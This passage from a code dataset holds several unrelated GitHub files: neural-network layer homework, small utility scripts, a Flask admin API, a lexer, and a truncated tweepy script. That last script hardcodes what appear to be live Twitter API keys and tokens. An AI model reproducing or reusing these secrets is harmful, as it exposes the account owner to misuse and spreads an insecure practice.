38, 38]\n    out_height = int(((H + 2 * pad - HH) / stride) + 1)  # 32\n    out_width = int(((W + 2 * pad - WW) / stride) + 1)  # 32\n    out = np.zeros([N, F, out_height, out_width])  # [N, 32, 32, 32]\n\n    for img in range(N):  # for each image, do the convolution\n        for kernal in range(F):  # for each filter: C weight maps (HH x WW) and one bias\n            for row in range(out_height):  # from top to bottom\n                for col in range(out_width):  # from left to right\n                    # multiply the filter weights elementwise with the matching\n                    # padded-input window, sum all products across channels,\n                    # then add the bias -> one output scalar at this position\n                    out[img, kernal, row, col] = np.sum(w[kernal, ...] 
* \\\n padded_x[img, :, row*stride:row*stride+HH, col*stride:col*stride+WW]) + b[kernal]\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n cache = (x, w, b, conv_param)\n return out, cache\n\n\ndef conv_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a convolutional layer.\n\n Inputs:\n - dout: Upstream derivatives.\n - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive\n\n Returns a tuple of:\n - dx: Gradient with respect to x\n - dw: Gradient with respect to w\n - db: Gradient with respect to b\n \"\"\"\n dx, dw, db = None, None, None\n\n N, F, out_height, out_width = dout.shape\n x, w, b, conv_param = cache\n \n stride, pad = [conv_param['stride'], conv_param['pad']]\n xpad = np.pad(x, ((0,0), (0,0), (pad,pad), (pad,pad)), mode='constant')\n num_filts, _, f_height, f_width = w.shape\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the backward pass of a convolutional neural network.\n # Calculate the gradients: dx, dw, and db.\n # ================================================================ #\n\n _, _, H, W = x.shape # [N, 3, 32, 32]\n dx_temp = np.zeros_like(xpad) # initial to all zeros\n dw = np.zeros_like(w)\n db = np.zeros_like(b)\n\n # Calculate dB.\n for kernal in range(F):\n db[kernal] += np.sum(dout[:, kernal, :, :]) # sum all N img's kernal -> [32, 32], then sum all 32x32 elements -> 1 scalar\n \n # Calculate dw.\n for img in range(N): # for each image\n for kernal in range(F): # for each kernal\n for row in range(out_height): # from top to bottom\n for col in range(out_width): # from left to right\n dw[kernal, ...] 
+= dout[img, kernal, row, col] * xpad[img, :, row*stride:row*stride+f_height, col*stride:col*stride+f_width]\n\n    # Calculate dx.\n    for img in range(N):  # for each image\n        for kernal in range(F):  # for each filter\n            for row in range(out_height):  # from top to bottom\n                for col in range(out_width):  # from left to right\n                    dx_temp[img, :, row*stride:row*stride+f_height, col*stride:col*stride+f_width] += dout[img, kernal, row, col] * w[kernal, ...]\n\n    dx = dx_temp[:, :, pad:H+pad, pad:W+pad]\n\n    # ================================================================ #\n    # END YOUR CODE HERE\n    # ================================================================ #\n\n    return dx, dw, db\n\n\ndef max_pool_forward_naive(x, pool_param):\n    \"\"\"\n    A naive implementation of the forward pass for a max pooling layer.\n\n    Inputs:\n    - x: Input data, of shape (N, C, H, W)\n    - pool_param: dictionary with the following keys:\n      - 'pool_height': The height of each pooling region\n      - 'pool_width': The width of each pooling region\n      - 'stride': The distance between adjacent pooling regions\n\n    Returns a tuple of:\n    - out: Output data\n    - cache: (x, pool_param)\n    \"\"\"\n    out = None\n\n    # ================================================================ #\n    # YOUR CODE HERE:\n    #   Implement the max pooling forward pass.\n    # ================================================================ #\n\n    pool_height = pool_param.get('pool_height')\n    pool_width = pool_param.get('pool_width')\n    stride = pool_param.get('stride')\n    N, C, H, W = x.shape  # [N, 3, 32, 32]\n\n    out_height = int(((H - pool_height) / stride) + 1)  # calculate output height\n    out_width = int(((W - pool_width) / stride) + 1)  # calculate output width\n    out = np.zeros([N, C, out_height, out_width])\n\n    for img in range(N):  # for each image\n        for channel in range(C):  # for each channel\n            for row in range(out_height):  # from top to bottom\n                for col in range(out_width):  # from left to right\n                    out[img, channel, row, col] = np.max(x[img, channel, row*stride:row*stride+pool_height, col*stride:col*stride+pool_width])\n\n    # ================================================================ #\n    # END YOUR CODE HERE\n    # ================================================================ #\n    cache = (x, pool_param)\n    return out, cache\n\ndef max_pool_backward_naive(dout, cache):\n    \"\"\"\n    A naive implementation of the backward pass for a max pooling layer.\n\n    Inputs:\n    - dout: Upstream derivatives\n    - cache: A tuple of (x, pool_param) as in the forward pass.\n\n    Returns:\n    - dx: Gradient with respect to x\n    \"\"\"\n    dx = None\n    x, pool_param = cache\n    pool_height, pool_width, stride = pool_param['pool_height'], pool_param['pool_width'], pool_param['stride']\n\n    # ================================================================ #\n    # YOUR CODE HERE:\n    #   Implement the max pooling backward pass.\n    # ================================================================ #\n\n    N, C, H, W = x.shape  # [N, 3, 32, 32]\n    _, _, dout_height, dout_width = dout.shape\n    dx = np.zeros_like(x)\n\n    for img in range(N):  # for each image\n        for channel in range(C):  # for each channel\n            for row in range(dout_height):  # from top to bottom\n                for col in range(dout_width):  # from left to right\n                    max_idx = np.argmax(x[img, channel, row*stride:row*stride+pool_height, col*stride:col*stride+pool_width])\n                    max_position = np.unravel_index(max_idx, [pool_height, pool_width])\n                    dx[img, channel, row*stride:row*stride+pool_height, col*stride:col*stride+pool_width][max_position] = dout[img, channel, row, 
col]\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ # \n\n return dx\n\ndef spatial_batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Computes the forward pass for spatial batch normalization.\n \n Inputs:\n - x: Input data of shape (N, C, H, W)\n - gamma: Scale parameter, of shape (C,)\n - beta: Shift parameter, of shape (C,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance. momentum=0 means that\n old information is discarded completely at every time step, while\n momentum=1 means that new information is never incorporated. The\n default of momentum=0.9 should work well in most situations.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n \n Returns a tuple of:\n - out: Output data, of shape (N, C, H, W)\n - cache: Values needed for the backward pass\n \"\"\"\n out, cache = None, None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the spatial batchnorm forward pass.\n #\n # You may find it useful to use the batchnorm forward pass you \n # implemented in HW #4.\n # ================================================================ #\n \n N, C, H, W = x.shape # [N, 3, 32, 32]\n x_transpose = x.transpose(0, 2, 3, 1)\n x_reshape = np.reshape(x_transpose, (N*H*W, C)) # reshape to 2D to do batchnorm\n out_2d, cache = batchnorm_forward(x_reshape, gamma, beta, bn_param) \n out = out_2d.reshape((N, H, W, C)).transpose(0, 3, 1, 2) # reshape back\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ # \n\n return out, cache\n\n\ndef spatial_batchnorm_backward(dout, cache):\n \"\"\"\n Computes the backward pass for spatial batch normalization.\n \n Inputs:\n - dout: Upstream derivatives, of shape (N, C, H, W)\n - cache: Values from the forward pass\n \n Returns a tuple of:\n - dx: Gradient with respect to inputs, of shape (N, C, H, W)\n - dgamma: Gradient with respect to scale parameter, of shape (C,)\n - dbeta: Gradient with respect to shift parameter, of shape (C,)\n \"\"\"\n dx, dgamma, dbeta = None, None, None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the spatial batchnorm backward pass.\n #\n # You may find it useful to use the batchnorm forward pass you \n # implemented in HW #4.\n # ================================================================ #\n \n dx = np.zeros_like(dout)\n N, C, H, W = dout.shape\n dout_transpose = dout.transpose((0, 2, 3, 1))\n dout_reshape = np.reshape(dout_transpose, (N*H*W, C)) # reshape to 2D to do batchnorm\n dx_2d, dgamma, dbeta = batchnorm_backward(dout_reshape, cache)\n dx = dx_2d.reshape((N, H, W, C)).transpose(0, 3, 1, 2) # reshape back\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ # \n\n return dx, dgamma, 
dbeta","repo_name":"Wangxh329/Neural-Networks-and-Deep-Learning","sub_path":"homework/hw5/code/nndl/conv_layers.py","file_name":"conv_layers.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"42332423218","text":"#x=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"x\")\n\ndef cBookadd(c_name,c_phno):\n    cb_add=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"a\")\n\n    cb_add.write(\"\\n\" + c_name + \": \" + str(c_phno))\n    cb_add.close()\n\n\ndef cBook_read():\n    c_open=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"r\")\n    for lines in c_open.readlines():\n        print(lines)\n    c_open.close()\n\n\ndef cSerch(line):\n    n=1\n\n    c_opens=open(\"C:\\\\Users\\\\DELL PC\\\\Desktop\\\\Python playground\\\\ContactBook\\\\CONTACT-Book.txt\",\"r\")\n    if n==1:\n        for lines in c_opens:\n            l=len(lines)\n            if (line in lines) and (len(line)==(l-13)):\n                print(lines)\n                n-=1\n    else:\n        c_opens.close()\n        print(\"S\")\n\n\nuser_Choice=input(\"Want to 'Add-contact' OR 'Read-Contact' (add or read): \").lower()\nif user_Choice==\"add\":\n    c_name=input(\"Enter the name :\")\n    c_phno=int(input(\"Enter the phno:\"))\n    cBookadd(c_name,c_phno)\nelif user_Choice==\"read\":\n    cBook_read()\nelif user_Choice==\"serch\":\n    line=input(\"Enter the name: \")\n    cSerch(line)","repo_name":"Arangarajan-Aero/contactBook","sub_path":"Contact.py","file_name":"Contact.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34904146994","text":"from tabuleiro import Tabuleiro\nfrom bestMoveSoldier import melhorMovimento\nimport os\n\ntab = Tabuleiro()\n\ngameLoop = True\n\n# how do you want to play?\nprint(\"Bem vindo ao jogo!\")\nplayer = input(\"Voce quer jogar como Soldado(S) ou Mercenario(M)?:\\n\")\n# possible values: M, S\n\nif player == \"S\" or player == \"s\":\n    player = \"sold\"\nelif player == \"M\" or player == \"m\":\n    player = \"merc\"\nelse:\n    print(\"Opcao invalida\")\n    gameLoop = False\n\nif player == \"merc\":\n    print(\"Voce esta jogando como Mercenario\\n\")\nelse:\n    player = \"sold\"\n    print(\"Voce esta jogando como Soldado\\n\")\n\n\nwhile gameLoop:\n    os.system(\"clear\")\n    tab.printInTerminal()\n    tab.printInWeb()\n\n    # read the selected position x, y\n    positionSelected = input(\"Digite a posição da peça a ser movida (x, y):\\n\")\n    if positionSelected:\n        # split on ','\n        positionSelected = positionSelected.split(\",\")\n        # convert to int\n        positionSelected = [int(positionSelected[0]), int(positionSelected[1])]\n\n    peca = tab.matrix[positionSelected[0]][positionSelected[1]]\n\n    if peca.tipo == None:\n        print(\"Nao ha peça nessa posição!\\n\")\n        delay = input('Pressione \"Enter\" para continuar...')\n        continue\n    elif peca.tipo == \"king\" and player == \"sold\":\n        print(\"Voce escolheu o Rei!\\n\")\n    elif peca.tipo != player:\n        print(peca.tipo, player)\n        print(\"Essa peça não é sua!\\n\")\n        delay = input('Pressione \"Enter\" para continuar...')\n        continue\n\n    print(peca.tipo)\n\n    # possible moves\n    movimentosPossiveis = tab.checarMovimentosPossiveis(peca)\n    print(movimentosPossiveis)\n\n    if len(movimentosPossiveis) == 0:\n        print(\"Não há movimentos possíveis para essa peça!\\n\")\n        delay = input('Pressione \"Enter\" para 
continuar...')\n        continue\n\n    print(\"Os movimentos possíveis para essa peça são:\\n\")\n    for i in range(len(movimentosPossiveis)):\n        print(\"Movimento\", i, \":\", movimentosPossiveis[i])\n\n    # read the chosen move\n    movimento = input(\"Digite o movimento que deseja fazer (numero):\\n\")\n    movimento = int(movimento)\n\n    if movimento >= len(movimentosPossiveis):\n        print(\"Movimento inválido!\\n\")\n        delay = input('Pressione \"Enter\" para continuar...')\n        continue\n\n    tab.moverPeca(\n        peca, movimentosPossiveis[movimento][0], movimentosPossiveis[movimento][1]\n    )\n\n    # ENEMY MOVE\n    nomeRealTurno = player\n    if player == \"sold\":\n        nomeRealTurno = \"soldado\"\n    else:\n        nomeRealTurno = \"mercenario\"\n\n    melhorMovInimigo = melhorMovimento(tab, nomeRealTurno)\n    print(\"peca\", melhorMovInimigo[1])\n\n    print(\"opa\", melhorMovInimigo[0][\"x\"], melhorMovInimigo[0][\"y\"])\n    tab.moverPeca(\n        melhorMovInimigo[1],\n        melhorMovInimigo[0][\"x\"],\n        melhorMovInimigo[0][\"y\"],\n    )\n\n    delay = input('Pressione \"Enter\" para continuar...')\n","repo_name":"VictorHugoDS/ProjetoIA2022","sub_path":"estruturaDados/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28604382284","text":"import os\nfrom typing import Tuple\n\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import datasets as torchdata\n\nfrom continuum.datasets import ImageFolderDataset\nfrom continuum.download import download_file_from_google_drive, untar\nfrom continuum.tasks import TaskType\n\n\nclass VLCS(ImageFolderDataset):\n    \"\"\"VLCS dataset group.\n\n    Contain Caltech101, LabelMe, SUN09, and VOC2007. Each made of 5 classes:\n    bird, car, chair, dog, and person.\n\n    * Unbiased Metric Learning: On the Utilization of Multiple Datasets and Web Images for Softening Bias\n      Fang, Xu, and Rockmore.\n      ICCV 2013\n    \"\"\"\n\n    images_gdrive_id = \"1skwblH1_okBwxWxmRsp9_qi15hyPpxg8\"\n\n    def __init__(\n        self,\n        data_path,\n        train: bool = True,\n        download: bool = True,\n        test_split: float = 0.2,\n        random_seed: int = 1,\n    ):\n        self._attributes = None\n        self.test_split = test_split\n        self.random_seed = random_seed\n        super().__init__(data_path, train, download)\n\n    @property\n    def data_type(self) -> TaskType:\n        return TaskType.IMAGE_PATH\n\n    def _download(self):\n        if not os.path.exists(os.path.join(self.data_path, \"VLCS\")):\n            tar_path = os.path.join(self.data_path, \"VLCS.tar.gz\")\n\n            if not os.path.exists(tar_path):\n                print(\"Downloading zip images archive...\", end=\" \")\n                download_file_from_google_drive(self.images_gdrive_id, tar_path)\n                print(\"Done!\")\n\n            print(\"Extracting archive...\", end=\" \")\n            untar(tar_path)\n            print(\"Done!\")\n\n    def get_data(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n        domains = [\"Caltech101\", \"LabelMe\", \"SUN09\", \"VOC2007\"]\n\n        full_x, full_y, full_t = [], [], []\n\n        for domain_id, domain_name in enumerate(domains):\n            dataset = torchdata.ImageFolder(\n                os.path.join(self.data_path, \"VLCS\", domain_name)\n            )\n            x, y, _ = self._format(dataset.imgs)\n            x_train, x_test, y_train, y_test = train_test_split(\n                x, y, test_size=self.test_split, random_state=self.random_seed\n            )\n\n            if self.train:\n                full_x.append(x_train)\n                full_y.append(y_train)\n            else:\n                full_x.append(x_test)\n                full_y.append(y_test)\n            full_t.append(np.ones_like(full_y[-1]) * domain_id)\n\n        x = np.concatenate(full_x)\n        y = np.concatenate(full_y)\n        t = np.concatenate(full_t)\n        return x, y, t\n","repo_name":"Continvvm/continuum","sub_path":"continuum/datasets/vlcs.py","file_name":"vlcs.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":368,"dataset":"github-code","pt":"37"} +{"seq_id":"21012166636","text":"class Features:\r\n    def __init__(self, tokenizer, max_length, stride):\r\n        self.max_length = max_length\r\n        self.stride = stride\r\n        self.tokenizer = tokenizer\r\n\r\n    def train_processing(self, dataset):\r\n        questions = [q.strip() for q in dataset['question']]\r\n        inputs = self.tokenizer(questions, dataset['context'],\r\n                                max_length = self.max_length,\r\n                                truncation = 'only_second',\r\n                                stride = self.stride,\r\n                                return_overflowing_tokens = True,\r\n                                return_offsets_mapping = True,\r\n                                padding = 'max_length')\r\n        # Start char and end char of each token\r\n        offset_mapping = inputs.pop('offset_mapping')\r\n        sample_map = inputs.pop('overflow_to_sample_mapping')\r\n        answers = dataset['answer']\r\n        start_positions = []\r\n        end_positions = []\r\n\r\n        for i, offset in enumerate(offset_mapping):\r\n            sample_idx = sample_map[i]\r\n            answer = answers[sample_idx]\r\n            start_char = answer['answer_start'][0]\r\n            end_char = start_char + len(answer['text'][0])\r\n            sequence_ids = inputs.sequence_ids(i)\r\n\r\n            idx = 0\r\n            while sequence_ids[idx] != 1:\r\n                idx += 1\r\n            # Index of the start token of the context\r\n            context_start = idx\r\n\r\n            while sequence_ids[idx] == 1:\r\n                idx += 1\r\n            # Index of the end token of the context\r\n            context_end = idx - 1\r\n\r\n            # Create label\r\n            if offset[context_start][0] > start_char or offset[context_end][1] < end_char:\r\n                start_positions.append(0)\r\n                end_positions.append(0)\r\n            else:\r\n                idx = context_start\r\n                while idx <= context_end and offset[idx][0] <= start_char:\r\n                    idx += 1\r\n                start_positions.append(idx - 1)\r\n\r\n                idx = context_end\r\n                while idx >= context_start and offset[idx][1] >= end_char:\r\n                    idx -= 1\r\n                end_positions.append(idx + 1)\r\n\r\n        inputs['start_positions'] = start_positions\r\n        inputs['end_positions'] = end_positions\r\n\r\n        return inputs\r\n\r\n    def valid_processing(self, dataset):\r\n        questions = [q.strip() for q in dataset['question']]\r\n        inputs = self.tokenizer(questions, dataset['context'],\r\n                                max_length = self.max_length,\r\n                                truncation = 'only_second',\r\n                                stride = self.stride,\r\n                                return_overflowing_tokens = True,\r\n                                return_offsets_mapping = True,\r\n                                padding = 'max_length')\r\n\r\n        sample_map = inputs.pop('overflow_to_sample_mapping')\r\n        example_ids = []\r\n        for i in range(len(inputs['input_ids'])):\r\n            sample_idx = sample_map[i]\r\n            example_ids.append(dataset['id'][sample_idx])\r\n\r\n            sequence_ids = inputs.sequence_ids(i)\r\n            offset = inputs['offset_mapping'][i]\r\n            inputs['offset_mapping'][i] = [j if sequence_ids[k] == 1 else None for k, j in enumerate(offset)]\r\n\r\n        inputs['example_id'] = example_ids\r\n        return inputs
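\r\n\r\n\r\n# --- Editorial note: illustrative sketch, not part of the original class. ---\r\n# The span-labeling loop in train_processing maps an answer's character span\r\n# onto token indices via the tokenizer's offset mapping. The same idea on a\r\n# hand-made offset list (hypothetical data, no tokenizer needed):\r\ndef char_span_to_token_span_sketch(offsets, start_char, end_char):\r\n    # offsets: one (start_char, end_char) pair per token, e.g. [(0, 4), (5, 9), (10, 14)]\r\n    start_token = next(i for i, o in enumerate(offsets) if o[1] > start_char)\r\n    end_token = next(i for i in reversed(range(len(offsets))) if offsets[i][0] < end_char)\r\n    return start_token, end_token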
","repo_name":"bomba1102/Demo-QA-Extraction-system","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8274440980","text":"\"\"\"\n@description: QA graph test interface\n@author: Xu Zhongkai\n@email: 1399350807@qq.com\n@time: 2019-05-27\n@version: 0.0.1\n\"\"\"\n\n\nimport os\nimport json\nimport logging\nfrom sementic_server.source.qa_graph.query_parser import QueryParser\n\nlogger = logging.getLogger(\"server_log\")\n\nif __name__ == '__main__':\n    case_num = 2\n    
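# --- Editorial note: context recap, inferred from the code in this block. ---\n    # case_num picks one of the case%d.json fixtures under data/test_case; the\n    # bracketed comment below appears to list the available cases (assumption).\n    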
# [1, 2, 4]\n if os.path.basename(os.getcwd()) == 'qa_graph':\n path = os.path.join(os.getcwd(), os.path.pardir, os.path.pardir, 'data', 'test_case', 'case%d.json' % case_num)\n else:\n path = os.path.join(os.getcwd(), 'sementic_server', 'data', 'test_case', 'case%d.json' % case_num)\n path = os.path.abspath(path)\n\n try:\n with open(path, 'r') as fr:\n data = json.load(fr)\n print(data)\n qg = QueryParser(data)\n qg.query_graph.show()\n\n output_path = os.path.join(os.getcwd(), os.path.pardir, os.path.pardir, 'output/graph_output')\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n output_path = os.path.join(output_path, 'example.json')\n qg.query_graph.export(output_path)\n except Exception as e:\n print(e)\n\n\n\n\n","repo_name":"xiaocuigit/sementic_server","sub_path":"sementic_server/source/qa_graph/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"15723448937","text":"# -*- coding:utf-8 -*-\n\n__author__ = 'huanghf'\n\n\"\"\"\n题目描述\n我们可以用2*1的小矩形横着或者竖着去覆盖更大的矩形。请问用n个2*1的小矩形无重叠地覆盖一个2*n的大矩形,总共有多少种方法?\n\"\"\"\n\nclass Solution:\n def rectCover(self, number):\n if number == 0:\n return 0\n if number == 1:\n return 1\n if number == 2:\n return 2\n a,b = 1,2\n for i in range(number-1):\n a,b = b,a+b\n return a\n\nnumber = 100\ns = Solution()\nprint(s.rectCover(number))","repo_name":"lovehhf/newcoder_py","sub_path":"剑指offer/递归和循环/矩形覆盖.py","file_name":"矩形覆盖.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26260100993","text":"\"\"\"format OSPF ROUTE output string.\"\"\"\n\n\ndef split_this(long_string):\n \"\"\"Return both strip and split methods of string.\"\"\"\n return long_string.strip().split()\n\n\nOSPF_ROUTE = \"O 10.0.24.0/24 [110/41] via 10.0.13.3, 3d18h, FastEthernet0/0\"\nTITLE_LIST = [\"Protocol:\",\n \"Prefix:\",\n \"AD/Metric:\",\n \"Next-Hop:\",\n \"Last update:\",\n \"Outbound Interface:\"]\n\nFINAL_LIST = split_this(OSPF_ROUTE.replace(',', ''))\nFINAL_LIST.remove('via')\nFINAL_LIST[2] = FINAL_LIST[2][1:-1]\n\nD = dict(zip(TITLE_LIST, FINAL_LIST))\n\nfor key in D:\n print('{:22} {:22}'.format(key, D[key]))\n","repo_name":"WizLuvFromMars/python-tools-poligon","sub_path":"3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37301752001","text":"from actuators.speak.speaker import Speaker\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom google.cloud import texttospeech\nimport logging\nimport os\n\n\nclass GoogleTextToSpeech(Speaker):\n\n output_filename = \"test.mp3\"\n\n def speak(self, message: str):\n # Create a Text-to-Speech client\n logging.debug(\"Creating text to speech client...\")\n client = texttospeech.TextToSpeechClient()\n\n logging.debug(\"Setting up Google Text to Speech configuration...\")\n # Set the text input\n input_text = texttospeech.SynthesisInput(text=message)\n\n # Configure the voice settings\n voice = texttospeech.VoiceSelectionParams(\n language_code=\"en-US\",\n ssml_gender=texttospeech.SsmlVoiceGender.FEMALE\n )\n\n # Set the audio configuration\n audio_config = texttospeech.AudioConfig(\n audio_encoding=texttospeech.AudioEncoding.MP3\n )\n\n # Perform the text-to-speech request\n logging.debug(\"Getting Google Text to Speech response...\")\n 
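# The call below issues a single synchronous synthesis request; the raw MP3\n        # bytes come back in response.audio_content, which is written to the\n        # temp file further down.\n        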
response = client.synthesize_speech(\n input=input_text, voice=voice, audio_config=audio_config\n )\n\n # Save the audio to a file\n logging.debug(f\"Writing temp response file to {self.output_filename}...\")\n with open(self.output_filename, 'wb') as out:\n out.write(response.audio_content)\n logging.debug(f\"Audio content written to '{self.output_filename}'\")\n\n # Speak\n logging.info(f\"Saying: {message}\")\n spoken_word = AudioSegment.from_mp3(self.output_filename)\n play(spoken_word)\n\n # Remove temp file\n try:\n logging.debug(f\"Trying to remove temp file: {self.output_filename}...\")\n os.remove(self.output_filename)\n except FileNotFoundError:\n pass\n except Exception as e:\n logging.error(f\"Could not remove temp file {self.output_filename} with error: {e}\")\n\n","repo_name":"danbrick92/general-ai","sub_path":"src/actuators/speak/google_tts/google_tts.py","file_name":"google_tts.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34567837746","text":"from flask_restx import Namespace, fields\nfrom flask import request\nfrom prod.api.base_resource import BaseResource\nfrom prod.db_models.admin_db_model import AdminDBModel\nfrom prod.exceptions import BusinessError, RepeatedEmailError\nfrom prod.schemas.user_representation import user_representation\nfrom prod.schemas.user_code20 import user_code20\nfrom prod.schemas.user_email_repeated import user_email_repeated\nfrom prod.schemas.constants import MISSING_VALUES_ERROR, REPEATED_USER_ERROR\n\n\nns = Namespace(\n name='admins',\n description='All users related operations'\n)\n\n\n@ns.route('')\nclass AdminsListResource(BaseResource):\n REGISTER_FIELDS = (\"name\", \"lastName\", \"email\", \"password\")\n\n code_status = {\n RepeatedEmailError: (409, REPEATED_USER_ERROR)\n }\n\n body_swg = ns.model(user_representation.name, user_representation)\n\n code_20x_swg = ns.model(user_code20.name, user_code20)\n\n code_400_swg = ns.model('One user output 400', {\n 'status': fields.String(example=MISSING_VALUES_ERROR),\n 'missing_args': fields.List(fields.String())\n })\n\n code_409_swg = ns.model(user_email_repeated.name, user_email_repeated)\n\n @ns.response(200, 'Success', fields.List(fields.Nested(code_20x_swg)))\n def get(self):\n \"\"\"Get all users data\"\"\"\n response_object =\\\n [user.serialize() for user in AdminDBModel.query.all()]\n return response_object, 200\n\n @ns.expect(body_swg)\n @ns.response(201, 'Success', code_20x_swg)\n @ns.response(400, MISSING_VALUES_ERROR, code_400_swg)\n @ns.response(409, 'User already exists', code_409_swg)\n def post(self):\n \"\"\"Create a new admin\"\"\"\n try:\n data = request.get_json()\n id = AdminDBModel.add_user(data['name'],\n data['lastName'],\n data['email'],\n data['password'])\n user_model = AdminDBModel.query.get(id)\n response_object = user_model.serialize()\n response_object['token'] = AdminDBModel.encode_auth_token(id)\n return response_object, 201\n except BusinessError as e:\n code, status = self.code_status[e.__class__]\n ns.abort(code, status=status)\n","repo_name":"Seedy-Fiuba-Grupo-5/Backend-users","sub_path":"backend_users/prod/api/admins_list_api.py","file_name":"admins_list_api.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72345455147","text":"__author__ = 'iravid'\n\nimport lex\n\nimport logging\nlogger = logging.getLogger(\"compile\")\n\nreserved_words = 
{\n    \"code\": \"CODE\",\n    \"const\": \"CONST\",\n    \"define\": \"DEFINE\",\n    \"do\": \"DO\",\n    \"float\": \"FLOATDECL\",\n    \"from\": \"FROM\",\n    \"if\": \"IF\",\n    \"int\": \"INTDECL\",\n    \"ival\": \"IVAL\",\n    \"otherwise\": \"OTHERWISE\",\n    \"read\": \"READ\",\n    \"rval\": \"RVAL\",\n    \"then\": \"THEN\",\n    \"to\": \"TO\",\n    \"when\": \"WHEN\",\n    \"while\": \"WHILE\",\n    \"write\": \"WRITE\",\n    \"and\": \"AND\",\n    \"or\": \"OR\"\n}\n\nreserved_symbols = [\n    \"LPAREN\", \"RPAREN\",\n    \"LCURLPAREN\", \"RCURLPAREN\",\n    \"COMMA\",\n    \"COLON\",\n    \"SEMICOLON\",\n    \"EXCLAMATION\",\n    \"PLUS\", \"MINUS\",\n    \"MULT\", \"DIV\",\n    \"EQ\", \"NEQ\", \"LT\", \"LTE\", \"GT\", \"GTE\",\n    \"ASSIGN\", \"CONSTASSIGN\"\n]\n\ncomposed_tokens = [\n    \"ID\",\n    \"INTEGER\",\n    \"FLOAT\"\n]\n\ntokens = reserved_symbols + list(reserved_words.values()) + composed_tokens\n\nt_LPAREN = r\"\\(\"\nt_RPAREN = r\"\\)\"\nt_LCURLPAREN = r\"\\{\"\nt_RCURLPAREN = r\"\\}\"\n\nt_COMMA = r\",\"\nt_COLON = r\":\"\nt_SEMICOLON = r\";\"\nt_EXCLAMATION = r\"!\"\n\nt_PLUS = r\"\\+\"\nt_MINUS = r\"-\"\nt_MULT = r\"\\*\"\nt_DIV = r\"/\"\n\nt_EQ = r\"==\"\nt_NEQ = r\"!=\"\n\nt_LT = r\"<\"\nt_LTE = r\"<=\"\nt_GT = r\">\"\nt_GTE = r\">=\"\n\nt_ASSIGN = r\":=\"\nt_CONSTASSIGN = r\"=\"\n\ndef t_ID(t):\n    r\"[a-zA-Z]([a-zA-Z]|[0-9])*\"\n\n    # Check if we found a reserved word\n    t.type = reserved_words.get(t.value, \"ID\")\n\n    return t\n\ndef t_FLOAT(t):\n    r\"[0-9]+\\.[0-9]*\"\n    t.value = float(t.value)\n\n    return t\n\ndef t_INTEGER(t):\n    r\"[0-9]+\"\n    t.value = int(t.value)\n\n    return t\n\n# Ignore whitespace\nt_ignore = \" \\t\"\n\n# Multiline-handling comment rule\ndef t_COMMENT(t):\n    r'//[^\\n]*\\n|/[*](.|\\n)*?[*]/'\n    t.lexer.lineno += t.value.count('\\n')\n\ndef t_NEWLINE(t):\n    r\"\\n+\"\n    t.lexer.lineno += t.value.count(\"\\n\")\n\ndef t_error(t):\n    logging.warning(\"Line %d: Skipping unexpected character '%s'\", t.lexer.lineno, t.value[0])\n    t.lexer.skip(1)\n\nlexer = lex.lex()","repo_name":"iravid/compiler","sub_path":"src/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13479418662","text":"import tweepy\nimport json\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport argparse\n\nconsumer_key = 'Fi8UY5UtgvSm5pw5Gzyz29ZLE'\nconsumer_secret = '9H8mFPrWlbFfwqXyoSIHierQY6VfVckw3c1c5BKACGyhBqVO2g'\naccess_token = '1216047470033149952-KmHP7X2LhqDwWleYUZNMFcjLdpxwjg'\naccess_secret = 